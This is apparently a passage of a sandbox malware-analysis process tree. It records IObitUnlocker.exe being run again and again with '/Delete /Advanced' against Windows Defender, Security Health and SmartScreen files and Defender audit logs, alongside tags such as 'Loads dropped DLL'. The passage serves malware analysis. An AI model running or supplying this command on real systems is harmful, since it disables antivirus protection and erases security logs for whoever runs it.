dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
